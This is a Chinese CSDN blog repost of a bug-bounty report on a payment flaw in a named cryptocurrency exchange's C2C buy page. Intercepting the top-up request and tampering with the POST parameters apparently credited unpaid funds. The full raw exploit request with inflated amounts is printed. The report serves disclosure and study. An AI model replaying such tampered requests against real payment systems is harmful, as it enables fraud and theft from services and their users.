【漏洞学习】DVP-2018-02639(支付漏洞)

最新推荐文章于 2021-09-02 21:48:31 发布
最新推荐文章于 2021-09-02 21:48:31 发布
阅读量135 收藏
点赞数
分类专栏: # DVP漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/86502811
版权

漏洞URL:

https://zbt.one/c2c

简要描述:

RT 可以越权修改充值,然后居然会到账,也买了以太坊

漏洞证明:

首先在我的钱包,然后点击充值抓包

然后修改POST提交参数,如图所示

发送数据包

这时候点击确认已汇

不知道为什么过段时间就会自动到账

然后我购买了2个以太坊,

漏洞利用代码:

 post数据包

POST /c2c/buy HTTP/1.1
Host: zbt.one
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: https://zbt.one/c2c
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: 
Connection: close
Upgrade-Insecure-Requests: 1

buyUnitPrice=6.5&buyNumber=11111111&cny_total=72222221.50

修复方案:

审核结果:

在审核时漏洞已无法复现,经双方协调,给予 0.5 ETH奖励

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DVP-EH-数字量模块
03-15
介绍了关于DVP-EH-数字量模块的详细说明,提供台达PLC的技术资料的下载。
基于DVP-M的LCD TV系统
08-31
【LCD TV系统基于DVP-M】的技术解析 随着数字化技术的迅速发展,LCD TV(液晶电视)技术已取得显著进步,成为了电视领域的主流。相较于传统的CRT电视,LCD TV具有轻薄便携、色彩鲜明、画质清晰、节能环保、能耗低...
什么是DVP?一文告诉你如何应对区块链安全危机
区块链大本营
08-21 5103
存在安全隐患的区块链生态自然成为黑客眼中的香饽饽,近年来,一系列安全事件层出不穷,波及范围和资产损失数额也不断增加。区块链行业的安全问题也愈发引人注目。DVP,全称Dec...
加快二代支付系统建设
sully2008的专栏
07-01 3497
中国现代化支付系统是我国重要的金融基础设施。中国人民银行自2000 年开始研究建设第一代支付系统,近年来相继建成了大额实时支付系统、小额批量支付系统、支票影像交换系统等应用系统。大额实时支付系统采用逐笔发送贷记支付指令,实时全额清算资金,资金汇划不到一分钟即可到账;通过连接各银行业金融机构行内支付系统、中央债券综合业务系统、银行卡支付系统、人民币同业拆借和外汇交易系统等多个系统,为银行业金融机构及
加快二代支付系统建设改进央行支付清算服务
yangzibin的博客
08-16 1032
王关荣   中国现代化支付系统是我国重要的金融基础设施。中国人民银行自2000 年开始研究建设第一代支付系统,近年来相继建成了大额实时支付系统、小额批量支付系统、支票影像交换系统等应用系统。大额实时支付系统采用逐笔发送贷记支 付指令,实时全额清算资金,资金汇划不到一分钟即可到账;通过连接各银行业金融机构行内支付系统、中央债券综合业务系统、银行卡支付系统、人民币同...
在互联网上,没有人知道你是一条狗?
热门推荐
信息安全-企业安全-数据安全
08-22 3万+
1993 年,《纽约客》(The New Yorker)杂志刊登一则由彼得·施泰纳(Peter Steiner)创作的漫画:标题是【On the Internet, nobody knows you’re a dog.】 这则漫画中有两只狗:一只黑狗站在电脑椅上,爪子扶着键盘。它望向站在地上、表情迷茫的另一只狗,兴奋地说:「在互联网上,没人知道你是一条狗。 (On the Internet, nobody knows you’re a dog.)画中那只狗的台词随即成了 IT 界广为流传的经典笑话。 那个
谷歌原数据保护团队技术主管:零信任实践分享
企业安全
09-02 2万+
本文作者2015至2020年有幸参与了谷歌生产环境零信任(Zero Trust in Production Environments)的理论和实践。在此背景下开发的Binary Authorization for Borg(BAB) 系统已经在谷歌生产环境中实现了全面覆盖:任何人在生产环境中以任何服务的身份运行任何软件包之前,都必须为目标服务建立一个足够强的BAB安全策略。不符合BAB安全策略的程序将不会被允许以相应服务的身份运行。 在实现和推广这种生产环境零信任的过程中,BAB团队走了不少弯
GANDCRAB V5.2勒索病毒,不可破解,尽快防御!
neulingxiabadu的专栏
04-18 651
近日,一款名为GandCrab V5.2的“侠盗病毒”肆虐而至,已攻击了巴西、美国、印度、印度尼西亚和巴基斯坦等多个国家,大有再现2017年WannaCry病毒“昔日荣光”(攻击全球150多个国家、造成总计超80亿天价损失)的迹象。 截止目前,我国已有数千台政府以及企业的电脑遭受到攻击,而各大安全团队目前还未找到破解之法。网安众安在此提醒大家,千万做好相关防...
由四位央行官员为你制作的“数字货币”说明书
程序员杂谈
12-29 506
转自公众号:数字经济 在全球范围内,中国央行将成为首个研究数字资产及真实应用的中央银行,并率先探索了区块链在货币发行中的实际应用。 需要明确的是,这里所说的数字资产是央行发行的法定货币。在实际使用体验中,数字资产可能与电子支付方式感受类似。但支付宝等只是电子支付方式,交易时所用的钱都是通过银行账户而来,也就是说支付宝里的钱实际上还是对应着一张张钞票。而数字资产就是一种电子货币,具有支付和流通属性...
周小川最新演讲:Libra可能会导致“赢者通吃”的局面(万字长文)
Kimi6688的博客
08-07 383
本文为中国人民银行原行长、中国金融学会会长周小川做客上海交通大学上海高级金融学院建院十周年系列活动的发言实录。 他认为,如果 Libra 成功的话,对弱势货币、不可兑换货币、发展中国家货币将有替代作用。强势货币在全球化过程中会侵蚀弱势货币,这是一个必然现象。只不过如果 Libra 之类冒出来且能够普及成功的话,就可能会大大加速这一过程。因此,这对人民币也是一个挑战。目前中国还存在一定程度的外汇管制...
浅析区块链起源及安全问题
架构文摘
03-08 1121
【前言】回忆几年前看雪的发展之路可谓荆棘铺路,曲折重重,后来随着生活所迫,走上了学习技术的道路,在之后由于家庭的羁绊,工作的繁杂,生活的艰辛,以及时间的流逝,让我渐渐淡出了看雪,甚至趋于忘却……而现在我十分感谢我的表弟,是他让我回到了阔别已久的看雪——就在前天,也就是2月25号,我的表弟从网吧回来之后,参加了一场过年后很普通的家庭聚餐。在聚餐上,他从始至终都带着一脸的沮丧与不甘,因为平时的忙碌,我
dvp-pm_1023_dvp-pm_1023_
09-29
【标题】"dvp-pm_1023_dvp-pm_1023_" 概述 这个名为 "dvp-pm_1023_dvp-pm_1023_" 的程序看起来是一个专门针对DVP-PM系列可编程控制器(PLC)的应用工具或固件更新包。DVP-PM可能是台达电子(Delta Electronics)的...
台达PLC_DVP-ES2系列选型手册.pdf
12-25
【台达PLC_DVP-ES2系列选型手册】是针对台达自动化产品线中的DVP-ES2系列可编程控制器的详细指南,旨在帮助用户进行正确的型号选择和应用设计。DVP-ES2系列作为小型PLC,集成了先进的技术和创新功能,适用于各种工业...
《传感器及应用》课程试题(A卷).doc
07-16
传感器
计算机网络期末复习.docx
07-16
计算机网络期末复习可以涵盖多个方面,包括计算机网络的基本概念、组成、功能、性能指标、体系结构以及各层协议等。以下是一个较为全面的复习框架: 一、计算机网络的基本概念 定义:计算机网络是将地理位置上分散的、具有独立功能的计算机系统,通过通信设备和线路连接起来,由功能完善的软件实现资源共享和信息传递的系统。 组成:从组成部分上看,计算机网络包括硬件、软件和协议;从工作方式上看,分为边缘网络和核心网络;从功能组成上看,分为通信子网(包括网桥、交换机和路由器)和资源子网(如计算机软件)。 二、计算机网络的分类 按分布范围分:广域网(WAN)、城域网(MAN)、局域网(LAN)、个域网(PAN)。 按使用者分:公用网、专用网。 按拓扑结构分:总线型、星型、环形、网状型。 三、计算机网络的功能 数据通信 资源共享(包括软件、硬件和数据) 分布式处理 提高可靠性 负载均衡 四、计算机网络的性能指标 时延:包括发送时延、传播时延等。发送时延=分组长度/信道宽度;传播时延=信道长度/电磁波在信道上的传播速率。 速率:连接到计算机网络上的主机在数字信道上传送数据的速率,也称数据传输速率、数据率或比特率,
传感器复习资料.doc
07-16
传感器
探索Java数据库连接的奥秘:JDBC的深度解析与实践
最新发布
07-16
Java是一种广泛使用的编程语言,由Sun Microsystems公司(现属于Oracle公司)在1995年首次发布。它是一种面向对象的语言,意味着它将现实世界中的事物抽象为对象,这些对象具有属性(数据)和方法(行为)。Java语言设计目标包括跨平台性、网络编程能力、健壮性、安全性和简单性。 ### Java的主要特点: 1. **跨平台性**:Java的口号是“一次编写,到处运行”(Write Once, Run Anywhere,简称WORA)。这得益于Java的运行时环境,即Java虚拟机(JVM),它允许Java程序在任何安装了JVM的平台上运行,而不需要重新编译。 2. **面向对象**:Java是一种面向对象的语言,支持封装、继承和多态等特性。 3. **健壮性**:Java设计时注重安全性和错误处理,例如通过强类型检查和异常处理机制。 4. **多线程**:Java内置了对多线程编程的支持,允许开发者创建同时执行的多个线程。 5. **网络编程**:Java提供了丰富的网络通信API,使得开发网络应用变得容易。 6. **安全性**:Java提供了一个安全
台达PLC_DVP-ES3系列编程手册_装置的定义与指令.pdf
12-25
通过深入学习这本编程手册,用户不仅能够掌握DVP-ES3系列PLC的基本操作,还能掌握高级功能和复杂控制策略的实现,从而在实际工程中发挥出这些设备的最大潜力。对于工程师和技术人员来说,这是一份不可或缺的参考资料...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值